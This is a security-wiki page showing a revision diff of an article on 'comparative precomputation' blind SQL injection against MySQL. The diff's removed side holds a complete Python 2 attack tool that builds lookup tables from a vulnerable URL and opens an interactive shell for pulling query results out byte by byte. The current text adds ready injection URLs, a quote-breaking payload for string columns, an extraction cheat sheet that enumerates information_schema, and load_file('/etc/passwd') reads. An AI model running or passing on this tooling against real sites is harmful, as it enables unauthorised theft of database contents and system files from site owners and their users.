Questions about this topic? Sign up to ask in the talk tab.

Difference between revisions of "SQL injection/Blind/Extraction/Precomputation"

From NetSec
Jump to: navigation, search
 
(89 intermediate revisions by 3 users not shown)
Line 1: Line 1:
==The comparative precomputation attack==
+
'''Comparative precomputation''' attacks are a form of ''[[blind SQL injection]]'' [[exploitation]], a two-part process in which the attacker crawls a particular sequence of data normally retrieved by the [[vulnerability|vulnerable]] [[input]] and uses the output to precompute a table for future comparison.  Once the table has been precomputed, it is possible to "lookup" [[hexadecimal]], [[binary]], and [[ascii]] values within it.  In some cases it is possible to ''[[#Getting past the byte|retrieve multiple bytes]]'' per request from a remote [[database]] with blind injection by utilizing this technique.
  
'''This attack relies heavily on the ''remote dataset'' for successful exploitation and is thus its rate of data retrieval is more variable than other methods. This significantly differs from previously discovered <u>[[#Expert:_Automated_Single-byte_exfiltration|single-request data exfiltration techniques]]</u> because:'''{{code|text=
+
{{info|This technique is much more efficient for blind data retrieval than [[boolean enumeration]], which requires as many as 8 [[HTTP]] requests to obtain the value of a single [[byte]]''Comparative precomputation'' is the ''quietest and fastest'' known blind [[SQL injection]] technique.}}
  
* ''It is not a timing attack''
+
{{social}}
* ''It is not limited to the value of a single byte''
+
 
 +
{{prereq|[[SQL injection]] and [[SQL orientation|manipulation of sql data]]}}
 +
 
 +
==The comparative precomputation attack==
 +
{{info|This attack heavily relies on the ''remote dataset'' for successful [[exploitation]] and thus its rate of data retrieval is more variable than other methods.}}
  
}}{{code|text=
+
{{code|text=
 
'''Requirements:'''
 
'''Requirements:'''
* <u>In order for it to be effectively faster than boolean enumeration, the contents of the query context (column and table) must contain 3 or more instances of unique column data</u>
+
* <u>Before comparative precomputation can be initiated, an attacker or penetration tester must be aware of the vulnerable query's context (column and table names).</u>
* <u>The precomputation attack is compatible with all database backends.</u>
+
* <u>In order for it to be effectively faster than boolean enumeration, the contents of the query result context (column and table) must contain 3 or more instances of unique column and row data</u>
}} '''Precomputation is done for performance reasons.  At the very least, a comparative test will be required.  The more complex a remote site is (random content generation, etc), the more difficult this type of attack becomes to automate.'''{{code|text=
+
}}  
* Examining the following query:
+
 
{{code|text=<source lang="php">  $query = "select * from articles where id=$input"; </source>}}
+
Precomputation using '''md5''' [[cryptography#hashes|hashing]] is done in the [[#Proof_of_Concept:_sqli-hap.py|proof of concept]] for performance and efficiency purposes.  At the very least, a comparative test will be required - without hashing, it is expected that ram usage may skyrocket.  The more complex a remote site is (random content generation, etc), the more difficult this type of [[sql injection]] [[exploitation|attack]] becomes to automate.
* And the following uri:
+
 
 +
== Theory ==
 +
'''[[Exploitation]] is a two part process:'''
 +
:# Precomputing the comparison data
 +
:# Data extraction
 +
 
 +
 
 +
The example in this section (''Theory'') is a more basic explaination to prepare the reader's comprehension of the [[#Surpassing_obstacles|more advanced explanation]] later and as such will be unlikely to exploit successfully.
 +
 
 +
 
 +
=== Building lookup tables ===
 +
* Take the following query
 +
{{code|text=<source lang="php">  $query = "select * from articles where id=" . $_GET['id']; </source>}}
 +
* Being executed at the following uri:
 
   /articles.php?id=1
 
   /articles.php?id=1
  
* Testing can be used to see if there are 255 articles by visiting:
+
* Assume, for one moment, that there are 255 rows with sequential id's starting at 1 in the articles tableIt will rarely ever be this way in the wild.
  /articles.php?id=255 '''Follow the next steps for automation (and sanity's) sake:'''{{code|text=
+
* Choose a language supporting something similar to [http://php.net/manual/en/function.array-flip.php '''array_flip()'''] for programming the automation tool.
+
* Write a loop to download each article
+
* In the loop, populate an array (using integer indexes) with checksum hashes as values
+
* Flip the array}}
+
'''Almost done!'''{{code|text=
+
* Then the following visit can take place:
+
  /articles.php?id&#x3d;ascii(substr(user(),1,1))
+
* Checksum the output
+
* Now accessing the checksums array using the checksum of the output as the key:
+
{{code|text=<source lang="php"> $ascii_code = $checksums[$output_checksum]; </source>
+
}}
+
}}
+
'''<i><u>And the value of a byte has been determined.</u></i>'''
+
{{protip|'''This attack can be extended by:'''{{code|text=
+
* Using arithmetic operators to get sequential id's offset from 0-255 (e.g.  /articles.php?id=(select ascii(substr(user(),1,1))+67)
+
* Using MySQL field operators and a static query that returns id's to bypass the requirement for the id's to be sequential
+
}}
+
}}
+
}}
+
  
{{code|text=<source lang="python">#!/usr/bin/python2
+
* First, the attacker would crawl all of the pages at id's 1-255, saving them in a hashtable with the associated id used to generate the response.
import sys
+
import urllib2
+
import time
+
from binascii import hexlify
+
import _mysql
+
import md5
+
import pickle
+
import re
+
import os
+
import threading
+
import Queue
+
import readline
+
readline.parse_and_bind('tab: complete')
+
readline.parse_and_bind('set editing-mode vi')
+
  
BOLD = '\033[1m'
+
=== Extracting a cell ===
BLUE = '\033[34m'
+
* To determine the ascii code of the first character of the [[sql]] version, an attacker might visit:
GREEN = '\033[32m'
+
  /articles.php?id=ascii(substring(version() from 1 for 1))
YELLOW = '\033[33m'
+
RED = '\033[91m'
+
ENDC = '\033[0m'
+
  
def request(request_url):
+
The attacker would then take a [[cryptography|checksum]] of the returned html data, and lookup the value of its corresponding numeric id which was saved during lookup table creation.  This numeric id's value now corresponds with the ascii value of the first [[byte]] of the version.  Following until the end of the cell, one could simply move to the next character:
   req = urllib2.Request(request_url)
+
   /articles.php?id=ascii(substring(version() from 2 for 1))
  req.add_header = ('User-agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1309.0 Safari/537.17')
+
  r = urllib2.urlopen(req)
+
  return r.read()
+
  
def construct_discovery_query(url, column, table, counter):
+
=== Extracting the length of a cell ===
  discovery = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=%s)"
+
Suppose the goal in this situation is to obtain the length of the string returned by [[SQL|SQL's]] native '''version()''' function. In some situations the [[database]] will treat the result of length() as a string or integer interchangably, however in some cases, [[programming#casting|casting]] may be required.
  discovery = discovery % (column, column, table, counter)
+
  return url + urllib2.quote(discovery)
+
  
def construct_injection_query(url, column, table, query, position):
+
The simple method for length determination of the version, or any cell is to treat the length as a string; for example an attacker may visit:
   injection = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=ascii(substring(compress((%s)) from %s for 1)))"
+
   /articles.php?id=length((select length(version())))
  injection = injection % (column, column, table, query, position)
+
  return url + urllib2.quote(injection)
+
  
def get_length(url, column, table, query, ascii_table, counter):
+
This is because it is highly unlikely that the result of the version query will be longer than (9 * 10 ^ 255).  Once the length of the length is determined by treating the length's length as a single [[byte]] and looking it up in the table, an attacker could grab single bytes of the length by their [[ascii]] codes:
   injection = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=(length(length(compress((%s))))))" % (column, column, table, query)
+
   /articles.php?id=ascii(substring(length(version()),1,1))
  length_length = url + urllib2.quote(injection)
+
  length_length = ascii_table[md5.new(request(length_length)).digest()]
+
  counter += 1
+
  
  length = ""
+
An attacker would then treat the length as a single cell being extracted until its value is determined.
  for i in range(1,length_length+1):
+
    injection = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=ascii(substring(length(compress((%s))) from %s for 1)))"
+
    injection = injection % (column, column, table, query, i)
+
    request_url = url + urllib2.quote(injection)
+
    length += chr(ascii_table[md5.new(request(request_url)).digest()])
+
    counter += 1
+
  
  return (int(length), counter)
+
== Surpassing obstacles ==
 +
With the [[#Building lookup tables|above example]], [[exploitation]] in the wild is extremely unlikely, due to the fact that the id's in the articles table may not in fact be sequential - there may not even be 255 of them!  Or what if the index column for the [[SQL orientation#Where|where clause]] is a string?  What if there are duplicates in the retrieved data?
  
def get_query(prompt):
+
=== Non-sequential identifiers ===
  while 1:
+
Different [[database engine|SQL services]] provide different interfaces for solving this problem.  This is where it becomes important to know the specific column name and table name for the injectable query
    query = raw_input(prompt)
+
    if query != "":
+
      break
+
  return query
+
  
def do_query(url, column, table, query, ascii_table, i, q):
+
Starting with the original example query:
  tmp = construct_injection_query(url, column, table, query, i)
+
{{code|text=<source lang="php">  $query = "select * from articles where id=" . $_GET['id']; </source>}}
  q.put(chr(ascii_table[md5.new(request(tmp)).digest()]))
+
  
def do_table(url, column, table, i, q):
+
The important bits are:
  tmp = construct_discovery_query(url, column, table, i)
+
* Current column name: id
  q.put(md5.new(request(tmp)).digest())
+
* Current table name: articles
  
def print_percent(percent, start_time):
+
Assuming that all of the articles are unique and that the id's are non-sequential, it is possible to retrieve 255 ordered results anyway.
  elapsed_time = time.time() - start_time
+
  eta = ((elapsed_time) / percent) * 100 - elapsed_time
+
  sys.stdout.write("\r%s[*]%s Percent complete: %s%.2f%%%s -- Time elapsed: %s%.2f%s seconds -- Estimated time left: %s%.2f%s" % (GREEN, ENDC, YELLOW, percent, ENDC, YELLOW, elapsed_time, ENDC, YELLOW, eta, ENDC))
+
  sys.stdout.flush()
+
  
def do_thread(target, args, counter, length, type_query):
+
==== Lookup Table ====
   if type_query == 0:
+
An attacker would visit the following url's during the lookup table's [[byte]] discovery (only 3 are shown):
    ascii_table = {}
+
   /articles.php?id=(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos='''1''')
   else:
+
   /articles.php?id=(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos='''2''')
    query_result = ""
+
  ...
 +
  /articles.php?id=(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos='''255''')
  
  if type_query == 0:
+
==== Data extraction ====
    i = 0
+
Iterating until the length of the version, an attacker would use the following url's to extract bytes from the string:
  else:
+
# /articles.php?id=(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos=ascii(substring(version() from '''1''' for 1)))
    i = 1
+
# /articles.php?id=(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos=ascii(substring(version() from '''2''' for 1)))
  
 +
=== String column index ===
 +
Using the following example query:
 +
{{code|text=<source lang="php">  $query = "select * from articles where title='" . $_GET['title'] . "'"; </source>}}
  
  sys.stdout.write("\r%s[*]%s Percent complete: %.2f%%" % (GREEN, ENDC, 0.0))
+
And the following uri:
   sys.stdout.flush()
+
   /articles.php?title=vulnerable_site
  start_time = time.time()
+
  
  while i < length:
+
An attacker is able to change title to the following:
    threads = {}
+
  vulnerable_site' and 1=5 or title=([mapping or extraction query]) #'
    queues  = []
+
  
    for j in range(0,11):
+
{{info|When performing web-based attacks, the '''"#"''' character must be URL encoded to '''%23''' in the client browser to prevent the HTTP protocol from treating it as an [[HTML]] anchor.}}
      if i < length:
+
        queues.append(Queue.Queue())
+
        threads[i] = threading.Thread(target=target, args=args + (i, queues[j]))
+
        i += 1
+
        counter += 1
+
        print_percent(100 * float(i) / float(length), start_time)
+
       
+
    for thread in threads:
+
      threads[thread].start()
+
  
    for j, thread in enumerate(sorted(threads.iterkeys())):
 
      if type_query == 0:
 
        ascii_table[queues[j].get()] = thread
 
      else:
 
        query_result += queues[j].get()
 
      threads[thread].join()
 
  
  sys.stdout.write('\n')
+
=== Duplicate http responses ===
  sys.stdout.flush()
+
The best way to avoid duplicate http responses is to modify the middle [[SQL_orientation#SELECT_-_Select_data_from_a_table|select query]] containing the join to add a [[SQL_orientation#Group_by|group by clause]]. If the return data is grouped by the resulting display column containing duplicate data before the row counter is applied, it will force the return data to be unique so that 255 ''unique'' [[cryptography#hashes|checksums]] may be collected.
  
  if type_query == 0:
+
=== Query cheat sheet ===
    return ascii_table
+
  else:
+
    return (counter, query_result)
+
  
def main(url, column, table):
+
Byte discovery table generation query (iterating over each row for 0..255) :
  session_name = re.split("(https?://)?(.*)/", url)[2]
+
{{code|text=<source lang="sql"(select [column] from
 +
    (select [column],@r:=@r+1 as pos from [table] c join (select @r:=0) r limit 255) x
 +
  where pos=$counter)</source>}}
  
  print "%s[*]%s Checking for existing session" % (GREEN, ENDC)
+
Data extraction (iterating over each byte to get its value for 1..length(cell)):
  try:
+
{{code|text=<source lang="sql"(select [column] from
    try:
+
     (select [column],@r:=@r+1 as pos from [table] c join (select @r:=0) r limit 255) x
      os.stat("data")
+
     where pos=ascii(substring(
    except:
+
        (select group_concat(table_name,0x2e,column_name) from information_schema.columns where table_schema=database())
      os.mkdir("data")
+
     from $counter for 1))
     ascii_table = pickle.load(open("data/%s" % session_name, "rb" ))
+
  );</source>}}
    print "%s[*]%s Loaded precomputation table." % (GREEN, ENDC)
+
  except:
+
    print "%s[*]%s Building precomputation table.." % (GREEN, ENDC)
+
     current = time.time()
+
    ascii_table = do_thread(do_table, (url, column, table, ), 0, 256, 0)
+
    pickle.dump(ascii_table, open("data/%s" % session_name, "wb"))
+
     print "\n%s[*]%s Precomputation table built in %s%f%s seconds." % (GREEN, ENDC, YELLOW, time.time() - current, ENDC)
+
  
  print "%s[*]%s Enter a sql query:" % (GREEN, ENDC)
+
== Getting past the byte ==
 +
So far it is proven that a single byte of data can be extracted.  In review:
 +
* A hashtable must be built using resultset rows 0-255 to retrieve the value of a byte in a single request.
 +
* This number of rows is 256 (0-255 starting from 0 is 256 values) because 2^8=256 and 8 bits are in a byte.
 +
Fortunately for [[hackers|exploit developers]], most [[SQL]] services provide multiple ways of converting string or other data to its [[binary]] format. 
  
  while 1:
 
    query = get_query("%ssql shell>%s " % (BOLD, ENDC))
 
    if query == "exit":
 
      break
 
  
    query_result = ""
+
=== [[Binary]] optimization ===
    counter = 0
+
This means that if there are even as few as 3 rows in the table, combined with a null identifier row (most likely a blank response; the same response would be obtained with a nonexistent index being placed into the where clause) there are 4 obtainable values - the same number of values provided by two bits (1/4 of 1 byte).  This would allow for the retrieval of 1/4 of 1 [[byte]] per request - still faster than [[boolean enumeration|boolean enumeration's]] single bit per request.
    current = time.time()
+
    (length, counter) = get_length(url, column, table, query, ascii_table, counter)
+
  
    (counter, query_result) = do_thread(do_query, (url, column, table, query, ascii_table, ), counter, length+1, 1)
+
In other cases, it also means that if there are 65,355 rows in the affected result set, it is possible to extract ''two [[byte]]s'', a full word - per request.  Due to lookup table construction, this is only a performance optimization over extracting a single byte under the circumstance that the attacker intends to retreive more than 65 kilobytes of data from the remote [[database]] (an optimization nonetheless).
  
    query = "SELECT UNCOMPRESS(0x%s)" % hexlify(query_result)
 
    mysql_connection = _mysql.connect('localhost', 'root', 'new-password')
 
    mysql_connection.query(query)
 
    result = mysql_connection.use_result()
 
    data = result.fetch_row()[0][0]
 
    mysql_connection.close()
 
  
    print data
+
==== Sizing the hashtable ====
    print "\nRequests: %s%d%s (%s%f%s seconds)\nLength of retrieved data: %s%s%d%s%s" % (YELLOW, counter, ENDC, YELLOW, time.time() - current, ENDC, BOLD, YELLOW, len(data), ENDC, ENDC)
+
The largest possible value to retrieve in a single request is equal to the result of the following query:
 +
{{code|text=<source lang="sql"> select count(context_column) from context_table</source>}}
  
  print "%s[*]%s Good bye" % (GREEN, ENDC)
+
So in the `articles' example, the result of:
 +
{{code|text=<source lang="sql"> select count(id)+1 from articles</source>}}
  
if __name__=="__main__":
+
This is the maximum bitwise or binary value we can obtain in a single request (called ''context_result_count'').  
  if len(sys.argv) != 4:
+
    print "Usage: %s <vulnerable url> <column name> <table name>" % sys.argv[0]
+
    exit()
+
  
  print "%s[*]%s Attacking: %s%s%s%s%s" % (GREEN, ENDC, BOLD, RED, sys.argv[1], ENDC, ENDC)
+
* The following equation can be used to determine the maximum bits available to extract in a single request (max_bits):
  main(sys.argv[1], sys.argv[2], sys.argv[3])
+
 
 +
n        = log(context_result_count) / log(2)
 +
max_bits = n - (n % 1)
 +
 
 +
==== Response extraction ====
 +
:''See Also: [[bitwise math]]''
 +
 
 +
To get at [[binary]] data, the [[hexadecimal]] value of the concatenated first two [[byte]]s in the version() string is casted to an integer for extraction:
 +
 
 +
{{code|text=<source lang="sql">
 +
mysql> select conv(hex(substr(version() from 1 for 2)),16,10);
 +
+-------------------------------------------------+
 +
| conv(hex(substr(version() from 1 for 2)),16,10) |
 +
+-------------------------------------------------+
 +
| 13614                                          |
 +
+-------------------------------------------------+
 +
1 row in set (0.00 sec)
 
</source>}}
 
</source>}}
 +
 +
Suppose there was only enough room for 10 bits.  When selecting 2 bytes, 16 bits are retrieved.  To [[bit shift|shift]] the value of the first sixteen bits by 6 bits to the right (grabbing only the first 10 bits):
 +
 +
{{code|text=<source lang="sql"> mysql> select conv(hex(substr(version() from 1 for 2)),16,10) >> 0x6;
 +
+--------------------------------------------------------+
 +
| conv(hex(substr(version() from 1 for 2)),16,10) >> 0x6 |
 +
+--------------------------------------------------------+
 +
|                                                    212 |
 +
+--------------------------------------------------------+
 +
1 row in set (0.01 sec)</source>}}
 +
 +
To get the next ten bits, (bits 11 through 20),  we start at the third bit (shift left 0x2) in the second byte of the string, continuing until halfway through the third byte (shift right 0x4, shift right 0x2 to fix shift left):
 +
 +
{{code|text=<source lang="sql">  mysql> select conv(hex(substr(version() from 2 for 2)),16,10) << 0x2 >> 0x6;
 +
+---------------------------------------------------------------+
 +
| conv(hex(substr(version() from 2 for 2)),16,10) << 0x2 >> 0x6 |
 +
+---------------------------------------------------------------+
 +
|                                                          739 |
 +
+---------------------------------------------------------------+
 +
1 row in set (0.00 sec)</source>}}
 +
 +
And so on and so forth.
 +
 +
=== Compression ===
 +
It is possible to utilize server-side compression before extracting the [[binary]] data from the [[database]], then decompress it locally:
 +
 +
{{code|text=<source lang="sql">  mysql> select uncompress(compress(version()));
 +
  +---------------------------------+
 +
  | uncompress(compress(version())) |
 +
  +---------------------------------+
 +
  | 5.1.61-0+squeeze1              |
 +
  +---------------------------------+
 +
  1 row in set (0.00 sec)</source>}}
 +
 +
On smaller pieces of data, this can actually lose out on performance:
 +
 +
{{code|text=<source lang="sql">  mysql> select length(compress(version()));
 +
  +-----------------------------+
 +
  | length(compress(version())) |
 +
  +-----------------------------+
 +
  |                          29 |
 +
  +-----------------------------+
 +
  1 row in set (0.00 sec)
 +
 +
  mysql> select length(version());
 +
  +-------------------+
 +
  | length(version()) |
 +
  +-------------------+
 +
  |                17 |
 +
  +-------------------+
 +
  1 row in set (0.00 sec)</source>}}
 +
 +
However on larger pieces of data, the compression can significantly increase efficiency:
 +
 +
{{code|text=<source lang="sql">  mysql> select length(load_file('/etc/passwd'));
 +
  +----------------------------------+
 +
  | length(load_file('/etc/passwd')) |
 +
  +----------------------------------+
 +
  |                            1225 |
 +
  +----------------------------------+
 +
  1 row in set (0.00 sec)
 +
 +
  mysql> select length(compress(load_file('/etc/passwd')));
 +
  +--------------------------------------------+
 +
  | length(compress(load_file('/etc/passwd'))) |
 +
  +--------------------------------------------+
 +
  |                                        535 |
 +
  +--------------------------------------------+
 +
  1 row in set (0.00 sec)</source>}}
 +
 +
== Proof of concept ==
 +
{{main|mysqli-blindutils}}
 +
 +
{{warning|<center>End user is responsible for his or her own actions when using this software.  It is a crime to use this software against any system that you do not own without written consent.</center>}}
 +
=== Video ===
 +
http://ascii.io/a/1588
 +
 +
=== Download ===
 +
 +
* [[sqli-hap.py]] : [[sqli-hap.py source|source]] - [[download sqli-happy|direct download]] - [[download mysqli-blindutils]]
 +
 +
== Related ==
 +
 +
=== Tools & Articles ===
 +
* [[Talk:Comparative_precomputation|A walkthrough - questions can be asked here!]]
 +
* [[Timing based extraction]]
 +
* [[Blind SQL injection]]
 +
* [[SQL injection]]
 +
* [[mysqli-blindutils]]
 +
* [[SQL backdoor]]s
 +
 +
=== Further reading ===
 +
* [[SQL orientation]]
 +
* [[MySQL]]
 +
* [[MySQL Troubleshooting]]
 +
 +
<includeonly>
 +
{{exploitation}}
 +
 +
[[Category:Web exploitation]]
 +
 +
 +
</includeonly>

Latest revision as of 20:06, 5 May 2013

Comparative precomputation attacks are a form of blind SQL injection exploitation, a two-part process in which the attacker crawls a particular sequence of data normally retrieved by the vulnerable input and uses the output to precompute a table for future comparison. Once the table has been precomputed, it is possible to "lookup" hexadecimal, binary, and ascii values within it. In some cases it is possible to retrieve multiple bytes per request from a remote database with blind injection by utilizing this technique.

c3el4.png This technique is much more efficient for blind data retrieval than boolean enumeration, which requires as many as 8 HTTP requests to obtain the value of a single byte. Comparative precomputation is the quietest and fastest known blind SQL injection technique.
SQL injection/Blind/Extraction/Precomputation requires a basic understanding of SQL injection and manipulation of sql data


The comparative precomputation attack

c3el4.png This attack heavily relies on the remote dataset for successful exploitation and thus its rate of data retrieval is more variable than other methods.

Requirements:

  • Before comparative precomputation can be initiated, an attacker or penetration tester must be aware of the vulnerable query's context (column and table names).
  • In order for it to be effectively faster than boolean enumeration, the contents of the query result context (column and table) must contain 3 or more instances of unique column and row data

Precomputation using md5 hashing is done in the proof of concept for performance and efficiency purposes. At the very least, a comparative test will be required - without hashing, it is expected that ram usage may skyrocket. The more complex a remote site is (random content generation, etc), the more difficult this type of sql injection attack becomes to automate.

Theory

Exploitation is a two part process:

  1. Precomputing the comparison data
  2. Data extraction


The example in this section (Theory) is a more basic explaination to prepare the reader's comprehension of the more advanced explanation later and as such will be unlikely to exploit successfully.


Building lookup tables

  • Take the following query
  $query = "select * from articles where id=" . $_GET['id']; 
  • Being executed at the following uri:
 /articles.php?id=1
  • Assume, for one moment, that there are 255 rows with sequential id's starting at 1 in the articles table. It will rarely ever be this way in the wild.
  • First, the attacker would crawl all of the pages at id's 1-255, saving them in a hashtable with the associated id used to generate the response.

Extracting a cell

  • To determine the ascii code of the first character of the sql version, an attacker might visit:
 /articles.php?id=ascii(substring(version() from 1 for 1))

The attacker would then take a checksum of the returned html data, and lookup the value of its corresponding numeric id which was saved during lookup table creation. This numeric id's value now corresponds with the ascii value of the first byte of the version. Following until the end of the cell, one could simply move to the next character:

 /articles.php?id=ascii(substring(version() from 2 for 1))

Extracting the length of a cell

Suppose the goal in this situation is to obtain the length of the string returned by SQL's native version() function. In some situations the database will treat the result of length() as a string or integer interchangably, however in some cases, casting may be required.

The simple method for length determination of the version, or any cell is to treat the length as a string; for example an attacker may visit:

 /articles.php?id=length((select length(version())))

This is because it is highly unlikely that the result of the version query will be longer than (9 * 10 ^ 255). Once the length of the length is determined by treating the length's length as a single byte and looking it up in the table, an attacker could grab single bytes of the length by their ascii codes:

 /articles.php?id=ascii(substring(length(version()),1,1))

An attacker would then treat the length as a single cell being extracted until its value is determined.

Surpassing obstacles

With the above example, exploitation in the wild is extremely unlikely, due to the fact that the id's in the articles table may not in fact be sequential - there may not even be 255 of them! Or what if the index column for the where clause is a string? What if there are duplicates in the retrieved data?

Non-sequential identifiers

Different SQL services provide different interfaces for solving this problem. This is where it becomes important to know the specific column name and table name for the injectable query.

Starting with the original example query:

  $query = "select * from articles where id=" . $_GET['id']; 

The important bits are:

  • Current column name: id
  • Current table name: articles

Assuming that all of the articles are unique and that the id's are non-sequential, it is possible to retrieve 255 ordered results anyway.

Lookup Table

An attacker would visit the following url's during the lookup table's byte discovery (only 3 are shown):

 /articles.php?id=(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos=1)
 /articles.php?id=(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos=2)
 ...
 /articles.php?id=(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos=255)

Data extraction

Iterating until the length of the version, an attacker would use the following url's to extract bytes from the string:

  1. /articles.php?id=(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos=ascii(substring(version() from 1 for 1)))
  2. /articles.php?id=(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos=ascii(substring(version() from 2 for 1)))

String column index

Using the following example query:

  $query = "select * from articles where title='" . $_GET['title'] . "'"; 

And the following uri:

 /articles.php?title=vulnerable_site

An attacker is able to change title to the following:

 vulnerable_site' and 1=5 or title=([mapping or extraction query]) #' 
c3el4.png When performing web-based attacks, the "#" character must be URL encoded to %23 in the client browser to prevent the HTTP protocol from treating it as an HTML anchor.


Duplicate http responses

The best way to avoid duplicate http responses is to modify the middle select query containing the join to add a group by clause. If the return data is grouped by the resulting display column containing duplicate data before the row counter is applied, it will force the return data to be unique so that 255 unique checksums may be collected.

Query cheat sheet

Byte discovery table generation query (iterating over each row for 0..255) :

  (SELECT [COLUMN] FROM
    (SELECT [COLUMN],@r:=@r+1 AS pos FROM [TABLE] c JOIN (SELECT @r:=0) r LIMIT 255) x
  WHERE pos=$counter)

Data extraction (iterating over each byte to get its value for 1..length(cell)):

  (SELECT [COLUMN] FROM
    (SELECT [COLUMN],@r:=@r+1 AS pos FROM [TABLE] c JOIN (SELECT @r:=0) r LIMIT 255) x
    WHERE pos=ascii(SUBSTRING(
        (SELECT group_concat(TABLE_NAME,0x2e,column_name) FROM information_schema.columns WHERE table_schema=DATABASE())
    FROM $counter FOR 1))
  );

Getting past the byte

So far it is proven that a single byte of data can be extracted. In review:

  • A hashtable must be built using resultset rows 0-255 to retrieve the value of a byte in a single request.
  • This number of rows is 256 (0-255 starting from 0 is 256 values) because 2^8=256 and 8 bits are in a byte.

Fortunately for exploit developers, most SQL services provide multiple ways of converting string or other data to its binary format.


Binary optimization

This means that if there are even as few as 3 rows in the table, combined with a null identifier row (most likely a blank response; the same response would be obtained with a nonexistent index being placed into the where clause) there are 4 obtainable values - the same number of values provided by two bits (1/4 of 1 byte). This would allow for the retrieval of 1/4 of 1 byte per request - still faster than boolean enumeration's single bit per request.

In other cases, it also means that if there are 65,355 rows in the affected result set, it is possible to extract two bytes, a full word - per request. Due to lookup table construction, this is only a performance optimization over extracting a single byte under the circumstance that the attacker intends to retreive more than 65 kilobytes of data from the remote database (an optimization nonetheless).


Sizing the hashtable

The largest possible value to retrieve in a single request is equal to the result of the following query:

 SELECT COUNT(context_column) FROM context_table

So in the `articles' example, the result of:

 SELECT COUNT(id)+1 FROM articles

This is the maximum bitwise or binary value we can obtain in a single request (called context_result_count).

  • The following equation can be used to determine the maximum bits available to extract in a single request (max_bits):
n        = log(context_result_count) / log(2)
max_bits = n - (n % 1)

Response extraction

See Also: bitwise math

To get at binary data, the hexadecimal value of the concatenated first two bytes in the version() string is casted to an integer for extraction:

 
 mysql> SELECT conv(hex(substr(version() FROM 1 FOR 2)),16,10);
 +-------------------------------------------------+
 | conv(hex(substr(version() FROM 1 FOR 2)),16,10) |
 +-------------------------------------------------+ 
 | 13614                                           |
 +-------------------------------------------------+
 1 ROW IN SET (0.00 sec)
 

Suppose there was only enough room for 10 bits. When selecting 2 bytes, 16 bits are retrieved. To shift the value of the first sixteen bits by 6 bits to the right (grabbing only the first 10 bits):

 mysql> SELECT conv(hex(substr(version() FROM 1 FOR 2)),16,10) >> 0x6;
 +--------------------------------------------------------+
 | conv(hex(substr(version() FROM 1 FOR 2)),16,10) >> 0x6 |
 +--------------------------------------------------------+
 |                                                    212 |
 +--------------------------------------------------------+
 1 ROW IN SET (0.01 sec)

To get the next ten bits, (bits 11 through 20), we start at the third bit (shift left 0x2) in the second byte of the string, continuing until halfway through the third byte (shift right 0x4, shift right 0x2 to fix shift left):

  mysql> SELECT conv(hex(substr(version() FROM 2 FOR 2)),16,10) << 0x2 >> 0x6;
 +---------------------------------------------------------------+
 | conv(hex(substr(version() FROM 2 FOR 2)),16,10) << 0x2 >> 0x6 |
 +---------------------------------------------------------------+
 |                                                           739 |
 +---------------------------------------------------------------+
 1 ROW IN SET (0.00 sec)

And so on and so forth.

Compression

It is possible to utilize server-side compression before extracting the binary data from the database, then decompress it locally:

  mysql> SELECT uncompress(compress(version()));
  +---------------------------------+
  | uncompress(compress(version())) |
  +---------------------------------+
  | 5.1.61-0+squeeze1               |
  +---------------------------------+
  1 ROW IN SET (0.00 sec)

On smaller pieces of data, this can actually lose out on performance:

  mysql> SELECT LENGTH(compress(version()));
  +-----------------------------+
  | LENGTH(compress(version())) |
  +-----------------------------+
  |                          29 |
  +-----------------------------+
  1 ROW IN SET (0.00 sec)
 
  mysql> SELECT LENGTH(version());
  +-------------------+
  | LENGTH(version()) |
  +-------------------+
  |                17 |
  +-------------------+
  1 ROW IN SET (0.00 sec)

However on larger pieces of data, the compression can significantly increase efficiency:

  mysql> SELECT LENGTH(load_file('/etc/passwd'));
  +----------------------------------+
  | LENGTH(load_file('/etc/passwd')) |
  +----------------------------------+
  |                             1225 |
  +----------------------------------+
  1 ROW IN SET (0.00 sec)
 
  mysql> SELECT LENGTH(compress(load_file('/etc/passwd')));
  +--------------------------------------------+
  | LENGTH(compress(load_file('/etc/passwd'))) |
  +--------------------------------------------+
  |                                        535 |
  +--------------------------------------------+
  1 ROW IN SET (0.00 sec)

Proof of concept

Main article: mysqli-blindutils
RPU0j.png
End user is responsible for his or her own actions when using this software. It is a crime to use this software against any system that you do not own without written consent.

Video

http://ascii.io/a/1588

Download

Related

Tools & Articles

Further reading